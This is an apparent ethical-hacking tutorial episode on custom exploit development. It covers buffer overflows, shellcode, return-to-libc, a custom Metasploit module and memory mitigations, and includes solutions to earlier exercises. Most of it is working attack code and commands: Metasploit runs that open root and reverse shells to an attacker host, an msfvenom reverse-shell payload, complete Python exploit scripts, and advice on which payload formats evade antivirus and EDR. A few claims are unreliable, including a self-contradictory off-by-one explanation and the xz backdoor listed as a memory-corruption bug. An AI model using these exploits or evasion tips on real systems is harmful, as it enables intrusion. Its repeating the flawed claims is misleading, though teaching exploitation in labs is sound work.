Learn Ethical Hacking (#42) - Custom Exploit Development - Writing ...

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

What will I learn

Why custom exploits matter -- when off-the-shelf modules fail and you need to write your own;
Memory corruption fundamentals -- the stack, heap, registers, and what happens when software crashes;
Buffer overflows -- smashing the stack to control the instruction pointer;
Shellcode -- writing position-independent code that spawns shells;
Return-to-libc -- calling system functions without injecting code;
Writing a Metasploit module -- turning a PoC into a reusable exploit;
Debugging workflow -- using GDB and x64dbg to analyze crashes and develop exploits;
Defense: ASLR, DEP/NX, stack canaries, and why modern software is harder to exploit.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
GDB (Linux) or x64dbg (Windows) installed;
Basic understanding of C and assembly language;
The ambition to learn ethical hacking and security research.

Difficulty

Advanced

Curriculum (of the `Learn Ethical Hacking` series):

Solutions to Episode 41 Exercises

Exercise 1: Metasploitable exploitation.

# Exploit 1: vsftpd 2.3.4 backdoor
msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> set RHOSTS 192.168.1.100
msf6> exploit
# [*] 192.168.1.100:21 - Banner: 220 (vsFTPd 2.3.4)
# [*] 192.168.1.100:21 - USER: 331 Please specify the password.
# [+] 192.168.1.100:21 - Backdoor service has been spawned
# [+] 192.168.1.100:21 - UID: uid=0(root) gid=0(root)
# Shell as root -- the vsftpd 2.3.4 backdoor opens port 6200 when
# you send a username ending in :) -- Metasploit automates this

# Exploit 2: Samba usermap_script (CVE-2007-2447)
msf6> use exploit/multi/samba/usermap_script
msf6> set RHOSTS 192.168.1.100
msf6> set payload cmd/unix/reverse
msf6> set LHOST 10.10.14.5
msf6> exploit
# [*] Command shell session 2 opened
# Shell as root -- Samba allows backtick command injection in
# the username field when using non-default "usermap script"

# Exploit 3: Tomcat manager upload
msf6> use exploit/multi/http/tomcat_mgr_upload
msf6> set RHOSTS 192.168.1.100
msf6> set HttpUsername tomcat
msf6> set HttpPassword tomcat
msf6> set payload java/meterpreter/reverse_tcp
msf6> set LHOST 10.10.14.5
msf6> exploit
# [*] Meterpreter session 3 opened
# Meterpreter as tomcat user -- the module uploads a WAR file
# containing the payload through the Tomcat Manager interface

Three exploits, three different services, three different access levels. The vsftpd backdoor and Samba exploit both gave root immediately -- these are service-level vulnerabilities in daemons running as root. The Tomcat exploit gave a lower-privileged shell (the tomcat user) because Tomcat runs as a service account, not root. In a real engagement, that Tomcat shell would be your foothold for privilege escalation (episodes 31-32) -- enumerate SUID binaries, check for kernel exploits, look for stored credentials. The three exploits demonstrate the full Metasploit workflow we covered: search, select, configure, exploit. The difference between them is which module you load and which payload you pair with it.

Exercise 2: Payload detection rates.

Windows reverse TCP EXE:     38/72 engines detected (53%)
+ shikata_ga_nai x5:         31/72 engines detected (43%)
Python reverse HTTPS:         4/72 engines detected (6%)
PowerShell one-liner:         8/72 engines detected (11%)

Conclusion: EXE payloads are heavily signatured regardless of
encoding. Script-based payloads (Python, PS) evade most AV.
Encoding reduces but does not eliminate detection.

The numbers tell a clear story. The raw Windows EXE is caught by more than half of all AV engines -- Metasploit payloads have been in every AV signature database for years. Encoding with shikata_ga_nai (5 iterations) drops detection by about 10 percentage points, which sounds useful until you realize 31 engines still catch it. The encoding polymorphism changes the binary signature but not the behavioral pattern -- and modern EDR watches behavior, not just static signatures. The Python and PowerShell payloads have dramatically lower detection because most AV engines are still optimized for PE binary scanning, not script analysis. This is exactly why we said in episode 41 that encoding is NOT a reliable evasion technique -- the detection differential between formats matters far more than how many times you run the encoder.

Exercise 3: Metasploit vs Sliver comparison.

                    Metasploit          Sliver
Implant size        ~73KB (staged)      ~11MB (static Go binary)
AV detection        High (well-known)   Low (newer, less signatured)
Post-exploit cmds   200+                ~40 (growing)
Pivoting            route add + portfwd WireGuard tunnel
Learning curve      Moderate            Low (simpler commands)
Community           Massive             Growing

The size difference is the most immediately visible: Metasploit's staged payloads are tiny (the stager downloads the full stage after execution) while Sliver compiles a complete Go binary. That 11MB Sliver implant is harder to deliver via phishing (an 11MB attachment is suspicious) but once on disk, its detection rate is significantly lower because Go binaries look very different from the C/Ruby payloads that AV vendors have been profiling for years. The WireGuard pivoting in Sliver is a legitimate improvement over Metasploit's route-based approach -- it creates an encrypted tunnel that's harder to detect on the network because WireGuard traffic looks like any other WireGuard VPN connection. Metasploit wins on post-exploitation depth (200+ modules vs ~40) and community size, but Sliver's trajectory is clearly upward. For real engagements, the practical choice often comes down to detection: if the target has mature EDR, Sliver's lower detection profile may get you the initial session that Metasploit's well-known signatures would not.

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

Episode 41 covered exploitation frameworks -- Metasploit's modular architecture and the search-select-configure-exploit workflow, Meterpreter as the in-memory post-exploitation Swiss Army Knife, payload generation with msfvenom and why encoding does not defeat modern EDR, Cobalt Strike's Malleable C2 profiles and Beacon implants, and open-source alternatives like Sliver and Havoc that are gaining traction in the red team community. You can now use Metasploit to scan, exploit, and post-exploit targets systematically, generate payloads in multiple formats, and understand why professional pentesters use frameworks instead of manual scripts for everything.

For 41 episodes, we've been using tools that other people built. Metasploit modules. Nmap scripts. Burp Suite extensions. SQLMap. Gobuster. These tools are powerful and they're essential to professional penetration testing -- nobody rewrites SQLMap from scratch for every engagement. But there's a fundamental difference between running use exploit/windows/smb/ms17_010_eternalblue and understanding WHY that exploit works at the memory level. Between pressing a button and understanding what happens when the button is pressed.

This episode is where we cross that line. We're going to look at how software actually breaks -- not at the application layer (SQL injection, XSS, SSRF -- we covered those in episodes 12-28) but at the binary level. How memory is organized. What happens when a program writes more data than a buffer can hold. How you can overwrite a return address to make the CPU jump wherever you want. How you write the machine code that executes after you've hijacked control flow. And how you package all of that into a reusable Metasploit module so your team doesn't have to reinvent it.

This is the hardest material in the series so far. I've marked the difficulty as Advanced for a reason. If you're comfortable with C programming and have a basic understanding of how a CPU executes instructions, you'll be fine. If not, I'd recommend getting comfortable with C first -- the concepts we're covering here are foundational to binary exploitation, and trying to learn both C and exploit development simultaneously is a recipe for frustration.

Here we go.

When Frameworks Are Not Enough

Metasploit has 2,200+ exploits. But the target you're testing might have a vulnerability that is NOT in Metasploit. A custom application built in-house. A proprietary protocol that only this one company uses. A zero-day in commercial software that nobody has published a module for yet. In these cases, you need to write your own exploit.

This is where the real skill lives. Running use exploit/... and pressing enter is point-and-click hacking. Writing your own exploit requires understanding how software breaks at the lowest level -- memory layout, CPU registers, instruction pointers, and the boundary between code and data. It's the difference between driving a car and understanding how the engine works. Both are useful. But when the engine does something unexpected, only one of those skill sets lets you figure out why.

The vulnerability class we're focusing on today is memory corruption -- specifically buffer overflows. These are the oldest and most fundamental class of binary exploitation. The first major buffer overflow exploit was the Morris Worm in 1988 (it exploited a buffer overflow in fingerd). Nearly four decades later, buffer overflows are still being discovered and exploited in production software. CVE-2024-21762 (Fortinet FortiOS), CVE-2023-4863 (libwebp, affecting Chrome and every app that renders WebP images), CVE-2024-3094 (the xz/liblzma backdoor that nearly compromised every Linux SSH server) -- all memory corruption bugs, discovered in 2023-2024, in software used by millions.

The Stack -- Where Everything Happens

To understand buffer overflows, you need to understand the call stack. Every time a function is called, the CPU creates a stack frame -- a block of memory that stores the function's local variables, its arguments, and critically, the return address that tells the CPU where to go when the function finishes:

High Memory
+------------------+
| Function args    |  <- pushed by caller
+------------------+
| Return address   |  <- where to go after function returns (CRITICAL)
+------------------+
| Saved EBP        |  <- previous frame pointer
+------------------+
| Local variables  |  <- buffers, integers, pointers
+------------------+
| ...              |
Low Memory (stack grows DOWN)

The return address is the key to everything. When a function finishes executing (hits a ret instruction), the CPU pops this address off the stack and jumps to it. Under normal operation, the return address points back to the calling function -- execution continues where it left off. But if you can overwrite the return address with an address you control, the CPU will jump wherever you tell it to. You control the instruction pointer. You control execution.

The stack grows downward (from high memory addresses to low) but data in buffers is written upward (from low addresses to high). This means that if a buffer overflows, the excess data writes INTO the saved frame pointer and the return address. This is not a coincidence -- it's a fundamental architectural property of how x86 (and most other architectures) manage function calls, and it's exactly what makes stack-based buffer overflows possible.

Buffer Overflow -- The Classic

A buffer overflow occurs when a program writes more data into a buffer than it was allocated to hold. The excess data overwrites adjacent memory on the stack -- including, if you write enough, the return address:

// vulnerable.c -- a deliberately vulnerable program
#include 
#include 

void vulnerable_function(char *input) {
    char buffer[64];        // 64 bytes allocated on the stack
    strcpy(buffer, input);  // NO bounds checking -- copies ALL of input
    printf("You said: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1)
        vulnerable_function(argv[1]);
    return 0;
}

The vulnerability is strcpy. It copies bytes from input into buffer until it encounters a null terminator (\0) in the source string. It has absolutely no concept of how large the destination buffer is. If input is 200 bytes and buffer is 64 bytes, strcpy cheerfully writes all 200 bytes, overwriting everything past the end of buffer -- the saved frame pointer, the return address, and whatever else is on the stack above it.

# Compile without protections (for learning purposes)
gcc -o vuln vulnerable.c -fno-stack-protector -z execstack -no-pie -m32

# -fno-stack-protector: disable stack canaries
# -z execstack: make the stack executable (disable NX/DEP)
# -no-pie: disable position-independent executable (fixed addresses)
# -m32: compile as 32-bit (simpler for learning)

# Normal input -- works fine
./vuln "Hello"
# Output: You said: Hello

# Overflow the buffer
./vuln $(python3 -c "print('A' * 100)")
# Segmentation fault (core dumped)
# The return address was overwritten with 0x41414141 (AAAA)

That segfault is not just a crash -- it's proof of control. The CPU tried to jump to address 0x41414141 (the hex representation of "AAAA") because we overwrote the return address with our A characters. The address 0x41414141 doesn't map to any valid memory, so the OS kills the process. But if we replace those As with an address that DOES point to valid memory -- specifically, memory containing code we want to execute -- we have arbitrary code execution.

Finding the Offset

To control the return address precisely, you need to know exactly how many bytes of padding sit between the start of the buffer and the return address on the stack. This isn't just 64 (the buffer size) -- the compiler may add padding bytes between the buffer and the saved frame pointer, and the saved frame pointer itself is 4 bytes (on 32-bit) before the return address.

Metasploit's pattern tools solve this elegantly:

# Generate a unique non-repeating pattern
msf-pattern_create -l 200
# Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2...

# Run the program with this pattern
./vuln "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1..."
# Crash: EIP = 0x63413163

# Find exactly where in the pattern that value appears
msf-pattern_offset -l 200 -q 63413163
# [*] Exact match at offset 76

# Verify: 76 bytes of padding + 4 bytes we control
./vuln $(python3 -c "print('A'*76 + 'BBBB')")
# EIP = 0x42424242 (BBBB) -- we control the instruction pointer!

The pattern works because every 4-byte sequence in it is unique. When the program crashes and the CPU tries to jump to whatever 4 bytes overwrote the return address, those 4 bytes map to exactly one position in the pattern. At offset 76, we can place any 4-byte address we want, and the CPU will jump there. Now we need somewhere useful to jump to.

The Debugging Workflow

Before I show you the exploit, a word on debugging -- because in practice, exploit development is 90% debugging and 10% writing the actual exploit. GDB (GNU Debugger) on Linux and x64dbg on Windows are your primary tools:

# Start GDB with our vulnerable program
gdb ./vuln

# Set a breakpoint at the vulnerable function
(gdb) break vulnerable_function
(gdb) run $(python3 -c "print('A'*76 + 'BBBB')")

# Examine the stack when we hit the breakpoint
(gdb) x/20x $esp
# Shows 20 hex words from the current stack pointer
# You can see your A's (0x41414141) filling the buffer
# and BBBB (0x42424242) sitting at the return address position

# Step through to the ret instruction
(gdb) disas vulnerable_function
(gdb) break *0x08049xxx   # address of the ret instruction
(gdb) continue

# At the ret instruction, examine what's about to be popped
(gdb) x/1x $esp
# 0xbffff5xx: 0x42424242  -- this is where the CPU will jump

# Examine memory for where to put shellcode
(gdb) x/50x $esp
# Look for your NOP sled or shellcode in the output

# PEDA or GEF make this much easier
# Install: https://github.com/longld/peda
# Adds commands like: checksec, pattern create, ropgadget

# GDB with PEDA (enhanced exploit development)
gdb -q ./vuln
gdb-peda$ checksec
# CANARY    : disabled
# FORTIFY   : disabled
# NX        : disabled     (stack is executable!)
# PIE       : disabled     (fixed addresses)
# RELRO     : Partial

gdb-peda$ pattern create 200
gdb-peda$ run 'Aa0Aa1Aa2...'
gdb-peda$ pattern offset $eip
# EIP+0 found at offset: 76

The checksec command is the first thing you should run against any binary you're analyzing. It tells you exactly which protections are enabled -- and therefore which exploitation techniques are viable. No canary means a straightforward stack overflow works. NX disabled means you can execute code on the stack. No PIE means addresses are fixed and predictable. In real-world targets, some or all of these protections will be enabled, and bypassing them requires more advanced techniques (which we'll cover in the next episode).

Shellcode -- The Payload

Shellcode is the machine code that executes after you hijack control flow. It's called "shellcode" because traditionally its purpose is to spawn a shell (/bin/sh), giving the attacker interactive command execution. The simplest Linux x86 shellcode uses the execve syscall to run /bin/sh:

; Linux x86 execve("/bin/sh") shellcode
; 28 bytes, no null bytes

xor    eax, eax      ; clear eax (avoid null bytes from mov eax, 0)
push   eax           ; push null terminator onto stack
push   0x68732f2f    ; push "//sh" (extra / is harmless, avoids null)
push   0x6e69622f    ; push "/bin"
mov    ebx, esp      ; ebx = pointer to "/bin//sh\0"
push   eax           ; push null (envp)
push   ebx           ; push pointer to string (argv[0])
mov    ecx, esp      ; ecx = argv array
xor    edx, edx      ; edx = envp = NULL
mov    al, 0xb       ; syscall number 11 = execve
int    0x80          ; trigger interrupt -> kernel executes syscall

A few things to notice about this shellcode. First, it uses xor eax, eax instead of mov eax, 0 to clear the register -- because mov eax, 0 encodes as B8 00 00 00 00, which contains null bytes. Null bytes (\x00) terminate C strings, so if our shellcode contains a null byte, strcpy will stop copying at that point and the shellcode will be truncated. Every instruction in the shellcode must be null-free. Second, it uses //sh instead of /sh to avoid a null byte in the second push (the / is harmless -- the OS treats //sh the same as /sh). These constraints are what make shellcode writing its own art -- you're writing machine code under tight constraints on which byte values you can use.

# Generate shellcode with msfvenom (instead of hand-writing it)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 \
    -f python -b '\x00'
# -p: payload (reverse TCP shell)
# -f python: output as Python byte string
# -b '\x00': avoid null bytes (bad characters)

# Output:
# buf =  b""
# buf += b"\xbd\x12\x34\x56\x78\xd9\xc1..."
# 95 bytes of encoded reverse shell shellcode

Now let's assemble the complete exploit:

#!/usr/bin/env python3
"""exploit.py -- buffer overflow exploit for vulnerable.c"""
import struct
import subprocess

# Offset to return address (found with pattern_offset)
offset = 76

# Address of our buffer on the stack (found with GDB)
# This points somewhere in our NOP sled
ret_addr = struct.pack('<I', 0xbffff5a0)

# NOP sled -- a landing zone of no-operation instructions
# We don't need to hit the exact start of our shellcode
# Anywhere in the NOP sled slides execution down to it
nop_sled = b'\x90' * 200

# Shellcode: Linux x86 execve /bin/sh (28 bytes)
shellcode  = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68'
shellcode += b'\x68\x2f\x62\x69\x6e\x89\xe3\x50'
shellcode += b'\x53\x89\xe1\x31\xd2\xb0\x0b\xcd'
shellcode += b'\x80'

# Build the payload
payload = b'A' * offset         # padding to reach return address
payload += ret_addr             # overwrite return address
payload += nop_sled             # landing zone
payload += shellcode            # the actual payload

# Execute
subprocess.run(['./vuln', payload])

The NOP sled (a long sequence of \x90 no-operation instructions) is important for reliability. We calculated the buffer's address with GDB, but that address might shift slightly due to environment variables, command-line argument length, or other factors. The NOP sled gives us a 200-byte landing zone -- the CPU just needs to hit anywhere in those 200 NOPs and it will slide forward into the shellcode. Without the NOP sled, we'd need to hit the exact first byte of our shellcode, which is fragile.

Return-to-libc -- When the Stack Is Not Executable

Modern systems mark the stack as non-executable using NX (No-Execute) or DEP (Data Execution Prevention). Your shellcode is sitting on the stack, but the CPU refuses to execute it -- the memory page is marked as "data, not code" and the CPU raises a hardware exception if you try to execute from it.

The solution: don't inject code at all. Instead, reuse code that already exists in memory. Every program links to libc (the C standard library), and libc contains system(), which executes shell commands. If you overwrite the return address with the address of system() and set up the stack correctly so that "/bin/sh" is its argument, you get a shell without any injected shellcode:

# Find the addresses we need (with ASLR disabled for learning)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# Find libc's base address
ldd vuln
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)

# Find system() offset within libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system"
# 0x00048150 system
# Absolute address: 0xf7c00000 + 0x00048150 = 0xf7c48150

# Find the "/bin/sh" string within libc (it's there -- libc uses it!)
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# 0x001bd0f5 /bin/sh
# Absolute address: 0xf7c00000 + 0x001bd0f5 = 0xf7dbd0f5

#!/usr/bin/env python3
"""ret2libc.py -- return-to-libc exploit (bypasses NX/DEP)"""
import struct
import subprocess

offset = 76

# Build a fake stack frame that calls system("/bin/sh")
# After overwriting the return address, the stack looks like:
#
# +------------------+
# | system() address |  <- CPU jumps here (our return address)
# +------------------+
# | fake return addr |  <- where system() "returns" to (don't care)
# +------------------+
# | "/bin/sh" addr   |  <- first argument to system()
# +------------------+

system_addr = struct.pack('<I', 0xf7c48150)  # address of system()
fake_return = b'BBBB'                         # we don't care where
                                              # system() returns
binsh_addr  = struct.pack('<I', 0xf7dbd0f5)  # address of "/bin/sh"

payload = b'A' * offset       # padding
payload += system_addr         # overwrite return address -> system()
payload += fake_return         # system()'s return address
payload += binsh_addr          # system()'s first argument

subprocess.run(['./vuln', payload])
# Shell! -- no code injection, NX bypass achieved

The elegance of return-to-libc is that you're not injecting any new code. You're calling a function that already exists in the process's address space with arguments that already exist in the process's address space. The "/bin/sh" string is inside libc because libc itself uses it internally. You're just... arranging the stack so that existing code does what you want. The defense that blocks code injection (NX) is completely irrelevant because you're not injecting code -- you're reusing what's already there.

This concept -- reusing existing code fragments instead of injecting new code -- is the foundation of Return-Oriented Programming (ROP), which chains together small sequences of existing instructions (called gadgets) to perform arbitrary computation. ROP is how modern exploits bypass NX/DEP even when system() isn't conveniently available. We'll cover ROP chains in detail in the next episode.

Writing a Metasploit Module

Once you have a working exploit, the professional move is to package it as a Metasploit module so your team can reuse it. This turns your one-off proof-of-concept into a tool that anyone on the team can use with the standard search-select-configure-exploit workflow:

# modules/exploits/linux/misc/custom_bof.rb
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Custom Buffer Overflow - VulnService',
      'Description' => 'Stack buffer overflow in vulnerable_service v1.0.
                        The service reads user input into a 64-byte stack
                        buffer using strcpy without bounds checking.',
      'Author'      => ['scipio'],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Targets'     => [
        ['Ubuntu 22.04 (libc 2.35)', { 'Ret' => 0xbffff5a0 }],
        ['Debian 12 (libc 2.36)',    { 'Ret' => 0xbffff590 }]
      ],
      'DefaultTarget' => 0,
      'Privileged'    => true
    ))
    register_options([
      Opt::RPORT(9999)
    ])
  end

  def exploit
    connect

    buf = rand_text(76)                    # random padding (offset 76)
    buf << [target.ret].pack('V')          # return address for this target
    buf << make_nops(200)                  # NOP sled
    buf << payload.encoded                 # Metasploit payload (selected
                                           # by the user: reverse_tcp,
                                           # meterpreter, whatever)

    print_status("Sending #{buf.length} byte exploit buffer...")
    sock.put(buf)
    handler                                # handle the incoming session
    disconnect
  end
end

# Use the custom module
msf6> use exploit/linux/misc/custom_bof
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 10.10.14.5
msf6> set payload linux/x86/meterpreter/reverse_tcp
msf6> show targets
# 0  Ubuntu 22.04 (libc 2.35)
# 1  Debian 12 (libc 2.36)
msf6> set target 0
msf6> exploit
# [*] Sending 305 byte exploit buffer...
# [*] Meterpreter session 1 opened

The module structure is important. The Targets array allows you to support multiple versions of the target software -- different OS versions might have the return address at a slightly different offset or at a different stack address. rand_text(76) generates random padding instead of repeating As, which avoids triggering IDS rules that look for long strings of identical bytes (a common indicator of buffer overflow attempts). And payload.encoded uses whatever payload the user selected, with whatever encoding they configured -- the module doesn't need to care about the specific shellcode because Metasploit handles that separation.

Modern Mitigations -- The Defense Stack

The exploits above work against programs compiled without protections. Modern software has multiple defense layers, and each one makes exploitation significantly harder:

ASLR (Address Space Layout Randomization)
  What it does: randomizes the base addresses of the stack, heap,
  libraries, and (with PIE) the executable itself at every run
  Impact: the addresses we hardcoded (0xbffff5a0, 0xf7c48150)
  change every time the program starts
  Bypass: information leak -- find a way to read a memory address
  from the running process, calculate the base, derive all other
  addresses from the known offsets

DEP/NX (Data Execution Prevention / No-Execute)
  What it does: marks stack and heap memory as non-executable
  Impact: shellcode on the stack can't execute
  Bypass: return-to-libc (as shown above), ROP chains

Stack Canaries (Stack Smashing Protection)
  What it does: compiler places a random value (the "canary")
  between local variables and the return address. Before the
  function returns, it checks if the canary was modified.
  If modified -> the overflow is detected -> program aborts
  Impact: you can't blindly overwrite past the canary without
  the program detecting the corruption
  Bypass: information leak to read the canary value, then include
  the correct canary in your overflow payload

PIE (Position Independent Executable)
  What it does: the code section of the executable itself is
  also randomized (ASLR only randomizes libraries by default)
  Impact: you can't use addresses within the executable for
  gadgets or return addresses
  Bypass: information leak + ROP (need a leak first)

RELRO (Relocation Read-Only)
  Full RELRO: GOT (Global Offset Table) is read-only after
  loading -- prevents GOT overwrite attacks
  Partial RELRO: some sections writable (exploitable)

CFI (Control Flow Integrity)
  What it does: validates that control flow follows the program's
  expected call graph at compile time. Indirect calls and returns
  are checked against a whitelist of valid targets.
  Impact: even if you control the instruction pointer, you can
  only jump to "valid" destinations per the CFI policy
  Bypass: very difficult. Active research area. CFI is the
  current frontier of exploit mitigation.

# Check which protections a binary has
checksec --file=/usr/bin/target_service

# Real-world example:
# RELRO: Full RELRO
# Stack Canary: Canary found
# NX: NX enabled
# PIE: PIE enabled
# All four defenses active -- exploitation requires:
# 1. Information leak (to defeat ASLR + PIE + canary)
# 2. ROP chain (to defeat NX)
# 3. Chaining the leak with the ROP in a single exploit

Each mitigation makes exploitation harder. Chaining bypasses for ASLR + DEP + canaries + PIE is what separates script kiddies from exploit developers. A fully protected binary on a modern Linux distro (Ubuntu 24.04, Fedora 40) with all compiler defaults enabled requires an information disclosure vulnerability (to leak addresses and the canary), a ROP chain (to bypass NX), and enough control over the stack to execute the chain reliably. That's a real engineering challenge, and it's why many binary exploits in modern CVEs are valued at $50,000-$250,000+ in bug bounty programs ;-)

The AI Slop Connection

AI code generators produce buffer-overflow-vulnerable code at an alarming rate. They use strcpy instead of strncpy, sprintf instead of snprintf, gets instead of fgets. The AI learned from decades of vulnerable C code on the internet and reproduces the same dangerous patterns because those patterns are statistically dominant in its training data.

Worse, when developers ask AI to "make this code secure," it often adds superficial checks that don't actually prevent the overflow. A bounds check on one code path but not another. A length truncation that's off by one. A strncpy call that forgets to null-terminate the destination buffer (which is a classic strncpy gotcha -- unlike strcpy, strncpy does NOT guarantee null termination if the source is longer than the limit). The AI produces code that looks safe to a casual review but crumbles under adversarial input.

I've seen AI-generated C code where the developer asked for "a safe string copy function" and the AI generated:

// AI-generated "safe" copy -- STILL VULNERABLE
void safe_copy(char *dest, const char *src, size_t dest_size) {
    if (strlen(src) < dest_size) {
        strcpy(dest, src);  // "safe" because we checked the length
    }
}

The strlen(src) call itself is a problem if src is not null-terminated -- strlen will read past the end of the buffer looking for a null byte, potentially causing a crash or information leak. And the < dest_size check is off by one -- it should be < dest_size for the null terminator, meaning a source string of exactly dest_size - 1 characters would pass the check but strcpy would write dest_size bytes (including the null terminator), which is correct in that specific case but the logic is fragile. The AI-generated "safe" version looks reasonable but introduces its own subtleties that a developer who doesn't understand the underlying memory model will not catch.

The real solution is simpler: use snprintf(dest, dest_size, "%s", src). One function call, always null-terminates, always respects the buffer size, no edge cases. But AI assistants rarely suggest it because snprintf appears less frequently in the training data than the strlen + strcpy pattern.

The Debugging Mindset

I want to emphasize something before we close. Exploit development is not about memorizing techniques -- it's about developing a debugging mindset. Every vulnerability is different. The buffer size is different, the offset is different, the available space for shellcode is different, the bad characters are different, the enabled protections are different. What stays constant is the process: find the crash, control the crash, analyze the memory state, identify what you can overwrite, figure out where to redirect execution, build the payload, test, debug, iterate.

The GDB workflow I showed you above is the skeleton of that process. You will spend hours staring at hex dumps of stack memory, stepping through instructions one at a time, watching registers change, trying to understand why your exploit crashes instead of spawning a shell. And when it finally works -- when you see that $ prompt appear where it shouldn't -- you'll understand why people get addicted to this.

Having said that, the exploits in this episode all targeted a deliberately vulnerable program with all protections disabled. Real-world binaries have ASLR, stack canaries, NX, PIE, and sometimes CFI. Bypassing those protections requires information leaks, ROP chains, heap exploitation techniques, and a deep understanding of the target operating system's memory management. That's what the upcoming episodes will cover -- the modern mitigation bypass techniques that make binary exploitation in 2026 a completely different discipline from what it was in 2005.

Exercises

Exercise 1: Compile the vulnerable.c program from this episode (with protections disabled: -fno-stack-protector -z execstack -no-pie -m32). Use msf-pattern_create and msf-pattern_offset to find the exact offset to the return address. Then use msfvenom to generate Linux x86 shellcode and build a working exploit that spawns a shell. Document each step with GDB output showing the stack before and after overflow. Save your exploit and notes to ~/lab-tools/custom-exploit/exercise1/.

Exercise 2: Modify your exploit to use return-to-libc instead of shellcode injection. Find the addresses of system() and "/bin/sh" in libc (with ASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space). Build the ret2libc payload and verify you get a shell. Then re-enable ASLR (echo 2 | sudo tee /proc/sys/kernel/randomize_va_space) and document why the exploit fails -- what address changes, and what error does the program produce? Save to ~/lab-tools/custom-exploit/exercise2/.

Exercise 3: Write a Metasploit module for a simple vulnerable TCP service. Create a Python server that reads input into a fixed-size buffer without bounds checking (similar to vulnerable.c but network-accessible on port 9999). Write the Metasploit module in Ruby following the template from this episode. Test the module from msfconsole and verify you get a session. Save both the server and module source code to ~/lab-tools/custom-exploit/exercise3/.

De groeten!

Hive account@scipio

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

What will I learn

Requirements

Difficulty

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 41 Exercises

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

When Frameworks Are Not Enough

The Stack -- Where Everything Happens

Buffer Overflow -- The Classic

Finding the Offset

The Debugging Workflow

Shellcode -- The Payload

Return-to-libc -- When the Stack Is Not Executable

Writing a Metasploit Module

Modern Mitigations -- The Defense Stack

The AI Slop Connection

The Debugging Mindset

Exercises

De groeten!

Curriculum (of the `Learn Ethical Hacking` series):